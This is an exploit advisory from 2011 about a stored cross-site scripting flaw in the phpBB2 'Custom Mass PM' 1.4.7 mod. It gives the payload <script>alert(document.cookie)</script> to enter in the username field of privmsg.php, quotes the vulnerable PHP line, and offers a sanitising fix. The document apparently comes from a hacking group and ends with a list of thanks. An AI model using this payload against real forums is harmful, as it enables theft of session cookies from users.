PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

`-------------------------------------------------------------------------------  
0 | | | | | | TM  
1 _______ _ __ ___ ______| |__ __ _ ___| | _____ _ __ _ __ ___| |_  
0 |_ / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|  
1 / / (_) | | | | __/ | | | | (_| | (__| < __/ | _| | | | __/ |_  
0 /___\___/|_| |_|\___| |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|  
1 0xPrivate 0xSecurity 0xTeam  
0 ++++++++++++++++++++++++++++++++++++++++++++++++++++  
1 A Placec Of 0days   
------------------------------------------------------------------------------  
  
^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability  
^ Author : Silic0n (science_media017[At]yahoo.com)  
^ MOD Title: Custom mass PM   
^ MOD Description: Add mass PM functionnality to group members (or all forums members) for authorized users. Add the possibility for all users to send ordinary PM to multiple users (usernames separated by a semi-colon)  
^ MOD Version: 1.4.7   
^ Exploit Release: 8/27/2011  
^ Vulnearble script: privmsg.php  
  
  
--------------------  
^ Payload  
--------------------  
0x1 : Goto forum_script/Privmsg.php  
0x2 : Username Input Box write Malicious JS eg :<script>alert(document.cookie)</script>  
  
--------------------  
^ Vulnearble code   
--------------------  
  
$to_username_array = explode (";", $HTTP_POST_VARS['username']);  
  
--------------------  
Fix :  
--------------------  
  
$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);  
$to_username_array = explode (";", $to_username);  
  
  
  
Special Thnanks To mafi, Gaurav_raj420 , Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,  
D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@ry@n ,entr0py, -[SiLeNtp0is0n]-  
,Ne0_Hacker, InX_R00t,DODo(:P) All ZH , DK & G4H members :)  
  
------------  
^ Site   
------------  
www.igniteds.net (ConsoleFx)  
  
`